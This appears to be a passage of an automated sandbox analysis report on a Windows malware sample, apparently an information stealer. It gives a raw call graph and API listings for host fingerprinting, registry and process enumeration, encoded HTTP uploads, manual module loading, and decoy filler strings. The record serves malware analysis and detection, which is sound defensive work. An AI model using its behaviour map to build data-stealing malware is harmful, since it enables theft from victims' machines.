15270->15275 15272 39a7a0 lstrcpy 15271->15272 15274 3907c3 15272->15274 15276 381590 lstrcpy 15274->15276 15277 390874 15275->15277 15279 39096b 15275->15279 15278 39080c 15276->15278 15280 39a740 lstrcpy 15277->15280 15281 39a7a0 lstrcpy 15278->15281 15282 39099c StrCmpCA 15279->15282 15283 390881 15280->15283 15285 390823 15281->15285 15286 3909ab 15282->15286 15287 390a2d 15282->15287 15284 39a9b0 4 API calls 15283->15284 15288 3908ac 15284->15288 15289 39a7a0 lstrcpy 15285->15289 15290 381590 lstrcpy 15286->15290 15287->13692 15292 39a920 3 API calls 15288->15292 15293 39083e 15289->15293 15291 3909f4 15290->15291 15294 39a7a0 lstrcpy 15291->15294 15295 3908b3 15292->15295 15987 38fb00 15293->15987 15297 390a0d 15294->15297 15298 39a9b0 4 API calls 15295->15298 15299 39a7a0 lstrcpy 15297->15299 15300 3908ba 15298->15300 15301 390a28 15299->15301 15302 39a8a0 lstrcpy 15300->15302 16103 390030 15301->16103 15635 39a7a0 lstrcpy 15634->15635 15636 381683 15635->15636 15637 39a7a0 lstrcpy 15636->15637 15638 381695 15637->15638 15639 39a7a0 lstrcpy 15638->15639 15640 3816a7 15639->15640 15641 39a7a0 lstrcpy 15640->15641 15642 3815a3 15641->15642 15642->14515 15644 3847c6 15643->15644 15645 384838 lstrlen 15644->15645 15669 39aad0 15645->15669 15647 384848 InternetCrackUrlA 15648 384867 15647->15648 15648->14592 15650 389af9 LocalAlloc 15649->15650 15651 384eee 15649->15651 15650->15651 15652 389b14 CryptStringToBinaryA 15650->15652 15651->14614 15651->14616 15652->15651 15653 389b39 LocalFree 15652->15653 15653->15651 15655 39a740 lstrcpy 15654->15655 15656 398b74 15655->15656 15657 39a740 lstrcpy 15656->15657 15658 398b82 GetSystemTime 15657->15658 15660 398b99 15658->15660 15659 39a7a0 lstrcpy 15661 398bfc 15659->15661 15660->15659 15661->14608 15663 39a931 15662->15663 15664 39a988 15663->15664 15666 39a968 lstrcpy lstrcat 15663->15666 15665 39a7a0 lstrcpy 15664->15665 15667 39a994 15665->15667 15666->15664 15667->14611 15668->14726 15669->15647 15670->14736 15671->14877 15672->14879 15673->14887 15802 3977a0 15674->15802 15677 3976c6 RegOpenKeyExA 15679 397704 RegCloseKey 15677->15679 15680 3976e7 RegQueryValueExA 15677->15680 15678 391c1e 15678->14969 15679->15678 15680->15679 15682 391c99 15681->15682 15682->14983 15684 391e09 15683->15684 15684->15025 15686 397a9a wsprintfA 15685->15686 15687 391e84 15685->15687 15686->15687 15687->15039 15689 397b4d 15688->15689 15691 391efe 15688->15691 15809 398d20 LocalAlloc CharToOemW 15689->15809 15691->15053 15693 39a740 lstrcpy 15692->15693 15694 397bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15693->15694 15701 397c25 15694->15701 15695 397d18 15697 397d28 15695->15697 15698 397d1e LocalFree 15695->15698 15696 397c46 GetLocaleInfoA 15696->15701 15699 39a7a0 lstrcpy 15697->15699 15698->15697 15703 397d37 15699->15703 15700 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15700->15701 15701->15695 15701->15696 15701->15700 15702 39a8a0 lstrcpy 15701->15702 15702->15701 15703->15066 15705 392008 15704->15705 15705->15081 15707 399493 GetModuleFileNameExA CloseHandle 15706->15707 15708 3994b5 15706->15708 15707->15708 15709 39a740 lstrcpy 15708->15709 15710 392091 15709->15710 15710->15096 15712 397e68 RegQueryValueExA 15711->15712 15713 392119 15711->15713 15714 397e8e RegCloseKey 15712->15714 15713->15110 15714->15713 15716 397fb9 GetLogicalProcessorInformationEx 15715->15716 15717 397fd8 GetLastError 15716->15717 15719 398029 15716->15719 15724 397fe3 15717->15724 15727 398022 15717->15727 15721 3989f0 2 API calls 15719->15721 15723 39807b 15721->15723 15722 3989f0 2 API calls 15725 392194 15722->15725 15726 398084 wsprintfA 15723->15726 15723->15727 15724->15716 15724->15725 15810 3989f0 15724->15810 15813 398a10 GetProcessHeap RtlAllocateHeap 15724->15813 15725->15124 15726->15725 15727->15722 15727->15725 15729 39220f 15728->15729 15729->15138 15731 3989b0 15730->15731 15732 39814d GlobalMemoryStatusEx 15731->15732 15734 398163 __aulldiv 15732->15734 15733 39819b wsprintfA 15735 392289 15733->15735 15734->15733 15735->15152 15737 3987fb GetProcessHeap RtlAllocateHeap wsprintfA 15736->15737 15739 39a740 lstrcpy 15737->15739 15740 39230b 15739->15740 15740->15166 15742 39a740 lstrcpy 15741->15742 15744 398229 15742->15744 15743 398263 15745 39a7a0 lstrcpy 15743->15745 15744->15743 15747 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15744->15747 15748 39a8a0 lstrcpy 15744->15748 15746 3982dc 15745->15746 15746->15183 15747->15744 15748->15744 15750 39a740 lstrcpy 15749->15750 15751 39835c RegOpenKeyExA 15750->15751 15752 3983ae 15751->15752 15753 3983d0 15751->15753 15754 39a7a0 lstrcpy 15752->15754 15755 3983f8 RegEnumKeyExA 15753->15755 15756 398613 RegCloseKey 15753->15756 15765 3983bd 15754->15765 15757 39843f wsprintfA RegOpenKeyExA 15755->15757 15758 39860e 15755->15758 15759 39a7a0 lstrcpy 15756->15759 15760 3984c1 RegQueryValueExA 15757->15760 15761 398485 RegCloseKey RegCloseKey 15757->15761 15758->15756 15759->15765 15763 3984fa lstrlen 15760->15763 15764 398601 RegCloseKey 15760->15764 15762 39a7a0 lstrcpy 15761->15762 15762->15765 15763->15764 15766 398510 15763->15766 15764->15758 15765->15209 15767 39a9b0 4 API calls 15766->15767 15768 398527 15767->15768 15769 39a8a0 lstrcpy 15768->15769 15770 398533 15769->15770 15771 39a9b0 4 API calls 15770->15771 15772 398557 15771->15772 15773 39a8a0 lstrcpy 15772->15773 15774 398563 15773->15774 15775 39856e RegQueryValueExA 15774->15775 15775->15764 15776 3985a3 15775->15776 15777 39a9b0 4 API calls 15776->15777 15778 3985ba 15777->15778 15779 39a8a0 lstrcpy 15778->15779 15780 3985c6 15779->15780 15781 39a9b0 4 API calls 15780->15781 15782 3985ea 15781->15782 15783 39a8a0 lstrcpy 15782->15783 15784 3985f6 15783->15784 15784->15764 15786 39a740 lstrcpy 15785->15786 15787 3986bc CreateToolhelp32Snapshot Process32First 15786->15787 15788 3986e8 Process32Next 15787->15788 15789 39875d CloseHandle 15787->15789 15788->15789 15791 3986fd 15788->15791 15790 39a7a0 lstrcpy 15789->15790 15792 398776 15790->15792 15791->15788 15793 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15791->15793 15794 39a8a0 lstrcpy 15791->15794 15792->15241 15793->15791 15794->15791 15796 39a7a0 lstrcpy 15795->15796 15797 3951b5 15796->15797 15798 381590 lstrcpy 15797->15798 15799 3951c6 15798->15799 15814 385100 15799->15814 15801 3951cf 15801->15253 15805 397720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15802->15805 15804 3976b9 15804->15677 15804->15678 15806 397780 RegCloseKey 15805->15806 15807 397765 RegQueryValueExA 15805->15807 15808 397793 15806->15808 15807->15806 15808->15804 15809->15691 15811 3989f9 GetProcessHeap HeapFree 15810->15811 15812 398a0c 15810->15812 15811->15812 15812->15724 15813->15724 15815 39a7a0 lstrcpy 15814->15815 15816 385119 15815->15816 15817 3847b0 2 API calls 15816->15817 15818 385125 15817->15818 15974 398ea0 15818->15974 15820 385184 15821 385192 lstrlen 15820->15821 15822 3851a5 15821->15822 15823 398ea0 4 API calls 15822->15823 15824 3851b6 15823->15824 15825 39a740 lstrcpy 15824->15825 15826 3851c9 15825->15826 15827 39a740 lstrcpy 15826->15827 15828 3851d6 15827->15828 15829 39a740 lstrcpy 15828->15829 15830 3851e3 15829->15830 15831 39a740 lstrcpy 15830->15831 15832 3851f0 15831->15832 15833 39a740 lstrcpy 15832->15833 15834 3851fd InternetOpenA StrCmpCA 15833->15834 15835 38522f 15834->15835 15836 3858c4 InternetCloseHandle 15835->15836 15837 398b60 3 API calls 15835->15837 15843 3858d9 codecvt 15836->15843 15838 38524e 15837->15838 15839 39a920 3 API calls 15838->15839 15840 385261 15839->15840 15841 39a8a0 lstrcpy 15840->15841 15842 38526a 15841->15842 15844 39a9b0 4 API calls 15842->15844 15846 39a7a0 lstrcpy 15843->15846 15845 3852ab 15844->15845 15847 39a920 3 API calls 15845->15847 15855 385913 15846->15855 15848 3852b2 15847->15848 15849 39a9b0 4 API calls 15848->15849 15850 3852b9 15849->15850 15851 39a8a0 lstrcpy 15850->15851 15852 3852c2 15851->15852 15853 39a9b0 4 API calls 15852->15853 15854 385303 15853->15854 15856 39a920 3 API calls 15854->15856 15855->15801 15857 38530a 15856->15857 15858 39a8a0 lstrcpy 15857->15858 15859 385313 15858->15859 15860 385329 InternetConnectA 15859->15860 15860->15836 15861 385359 HttpOpenRequestA 15860->15861 15863 3858b7 InternetCloseHandle 15861->15863 15864 3853b7 15861->15864 15863->15836 15865 39a9b0 4 API calls 15864->15865 15866 3853cb 15865->15866 15867 39a8a0 lstrcpy 15866->15867 15868 3853d4 15867->15868 15869 39a920 3 API calls 15868->15869 15870 3853f2 15869->15870 15871 39a8a0 lstrcpy 15870->15871 15872 3853fb 15871->15872 15873 39a9b0 4 API calls 15872->15873 15874 38541a 15873->15874 15875 39a8a0 lstrcpy 15874->15875 15876 385423 15875->15876 15877 39a9b0 4 API calls 15876->15877 15878 385444 15877->15878 15879 39a8a0 lstrcpy 15878->15879 15880 38544d 15879->15880 15881 39a9b0 4 API calls 15880->15881 15882 38546e 15881->15882 15883 39a8a0 lstrcpy 15882->15883 15975 398ead CryptBinaryToStringA 15974->15975 15979 398ea9 15974->15979 15976 398ece GetProcessHeap RtlAllocateHeap 15975->15976 15975->15979 15977 398ef4 codecvt 15976->15977 15976->15979 15978 398f05 CryptBinaryToStringA 15977->15978 15978->15979 15979->15820 15983->15256 16226 389880 15984->16226 15986 3898e1 15986->15263 15988 39a740 lstrcpy 15987->15988 15989 38fb16 15988->15989 16161 39a740 lstrcpy 16160->16161 16162 390266 16161->16162 16163 398de0 2 API calls 16162->16163 16164 39027b 16163->16164 16165 39a920 3 API calls 16164->16165 16166 39028b 16165->16166 16167 39a8a0 lstrcpy 16166->16167 16168 390294 16167->16168 16169 39a9b0 4 API calls 16168->16169 16170 3902b8 16169->16170 16227 38988e 16226->16227 16230 386fb0 16227->16230 16229 3898ad codecvt 16229->15986 16233 386d40 16230->16233 16234 386d63 16233->16234 16246 386d59 16233->16246 16234->16246 16247 386660 16234->16247 16236 386dbe 16236->16246 16253 3869b0 16236->16253 16238 386e2a 16239 386ee6 VirtualFree 16238->16239 16241 386ef7 16238->16241 16238->16246 16239->16241 16240 386f41 16242 3989f0 2 API calls 16240->16242 16240->16246 16241->16240 16243 386f38 16241->16243 16244 386f26 FreeLibrary 16241->16244 16242->16246 16245 3989f0 2 API calls 16243->16245 16244->16241 16245->16240 16246->16229 16252 38668f VirtualAlloc 16247->16252 16249 386730 16250 38673c 16249->16250 16251 386743 VirtualAlloc 16249->16251 16250->16236 16251->16250 16252->16249 16252->16250 16254 3869c9 16253->16254 16255 3869d5 16253->16255 16254->16255 16256 386a09 LoadLibraryA 16254->16256 16255->16238 16256->16255 16257 386a32 16256->16257 16260 386ae0 16257->16260 16263 398a10 GetProcessHeap RtlAllocateHeap 16257->16263 16259 386ba8 GetProcAddress 16259->16255 16259->16260 16260->16255 16260->16259 16261 3989f0 2 API calls 16261->16260 16262 386a8b 16262->16255 16262->16261 16263->16262

                            Executed Functions

                            Function 00399860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 399860-399874 call 399750 663 39987a-399a8e call 399780 GetProcAddress * 21 660->663 664 399a93-399af2 LoadLibraryA * 5 660->664 663->664 665 399b0d-399b14 664->665 666 399af4-399b08 GetProcAddress 664->666 668 399b46-399b4d 665->668 669 399b16-399b41 GetProcAddress * 2 665->669 666->665 671 399b68-399b6f 668->671 672 399b4f-399b63 GetProcAddress 668->672 669->668 673 399b89-399b90 671->673 674 399b71-399b84 GetProcAddress 671->674 672->671 675 399bc1-399bc2 673->675 676 399b92-399bbc GetProcAddress * 2 673->676 674->673 676->675
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,011521E8), ref: 003998A1
                            • GetProcAddress.KERNEL32(74DD0000,01152458), ref: 003998BA
                            • GetProcAddress.KERNEL32(74DD0000,01152188), ref: 003998D2
                            • GetProcAddress.KERNEL32(74DD0000,01152200), ref: 003998EA
                            • GetProcAddress.KERNEL32(74DD0000,011522A8), ref: 00399903
                            • GetProcAddress.KERNEL32(74DD0000,011590B0), ref: 0039991B
                            • GetProcAddress.KERNEL32(74DD0000,011453F0), ref: 00399933
                            • GetProcAddress.KERNEL32(74DD0000,01145330), ref: 0039994C
                            • GetProcAddress.KERNEL32(74DD0000,01152218), ref: 00399964
                            • GetProcAddress.KERNEL32(74DD0000,01152278), ref: 0039997C
                            • GetProcAddress.KERNEL32(74DD0000,01152230), ref: 00399995
                            • GetProcAddress.KERNEL32(74DD0000,01152248), ref: 003999AD
                            • GetProcAddress.KERNEL32(74DD0000,01145550), ref: 003999C5
                            • GetProcAddress.KERNEL32(74DD0000,01152260), ref: 003999DE
                            • GetProcAddress.KERNEL32(74DD0000,011522F0), ref: 003999F6
                            • GetProcAddress.KERNEL32(74DD0000,01145350), ref: 00399A0E
                            • GetProcAddress.KERNEL32(74DD0000,01152308), ref: 00399A27
                            • GetProcAddress.KERNEL32(74DD0000,01152320), ref: 00399A3F
                            • GetProcAddress.KERNEL32(74DD0000,01145370), ref: 00399A57
                            • GetProcAddress.KERNEL32(74DD0000,01152338), ref: 00399A70
                            • GetProcAddress.KERNEL32(74DD0000,01145430), ref: 00399A88
                            • LoadLibraryA.KERNEL32(01152470,?,00396A00), ref: 00399A9A
                            • LoadLibraryA.KERNEL32(011524E8,?,00396A00), ref: 00399AAB
                            • LoadLibraryA.KERNEL32(011524A0,?,00396A00), ref: 00399ABD
                            • LoadLibraryA.KERNEL32(01152488,?,00396A00), ref: 00399ACF
                            • LoadLibraryA.KERNEL32(01152500,?,00396A00), ref: 00399AE0
                            • GetProcAddress.KERNEL32(75A70000,01152518), ref: 00399B02
                            • GetProcAddress.KERNEL32(75290000,011524D0), ref: 00399B23
                            • GetProcAddress.KERNEL32(75290000,011524B8), ref: 00399B3B
                            • GetProcAddress.KERNEL32(75BD0000,01152530), ref: 00399B5D
                            • GetProcAddress.KERNEL32(75450000,01145250), ref: 00399B7E
                            • GetProcAddress.KERNEL32(76E90000,011591B0), ref: 00399B9F
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00399BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00399BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 0dbb15979f8127da16a89459921e5098375d8972816802c1c66fe9b0725fc3e3
                            • Instruction ID: 0afa8450dcb3e2371a29d91b22d20635bc77a6efdd8a56d5291d6a3c66bfd0f3
                            • Opcode Fuzzy Hash: 0dbb15979f8127da16a89459921e5098375d8972816802c1c66fe9b0725fc3e3
                            • Instruction Fuzzy Hash: 30A1BFB5500A489FD308EFA8FD88E563FF9F76C309704851AE605C3225D779984AFB16
                            Function 003845C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 3845c0-384695 RtlAllocateHeap 781 3846a0-3846a6 764->781 782 3846ac-38474a 781->782 783 38474f-3847a9 VirtualProtect 781->783 782->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0038460F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0038479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846B7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038471E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038477B
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384657
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038475A
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038466D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384683
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846D8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384765
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846AC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384678
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384713
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846CD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384734
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845E8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845DD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384729
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845D2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846C2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384770
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845C7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384662
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038474F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845F3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038473F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 77cffd5c73ef494fb682f23c877f88e34be8bdf390181f3b2eb24a8e0440e12c
                            • Instruction ID: 2e063f7c37fa68541b47a022c2f46aba042bd111f5326623eb455024a3b2b625
                            • Opcode Fuzzy Hash: 77cffd5c73ef494fb682f23c877f88e34be8bdf390181f3b2eb24a8e0440e12c
                            • Instruction Fuzzy Hash: 584106606E77047EE626BFA49842EDD777ADF4770CF587044E8205638FCBB065894622
                            Function 00386280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                              • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                            • StrCmpCA.SHLWAPI(?,0115E828), ref: 00386303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                            • HttpOpenRequestA.WININET(00000000,GET,?,0115DFC8,00000000,00000000,00400100,00000000), ref: 00386385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003863FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0038646D
                            • InternetCloseHandle.WININET(00000000), ref: 003864EF
                            • InternetCloseHandle.WININET(00000000), ref: 003864F9
                            • InternetCloseHandle.WININET(00000000), ref: 00386503
                            Strings
                            Memory Dump Source
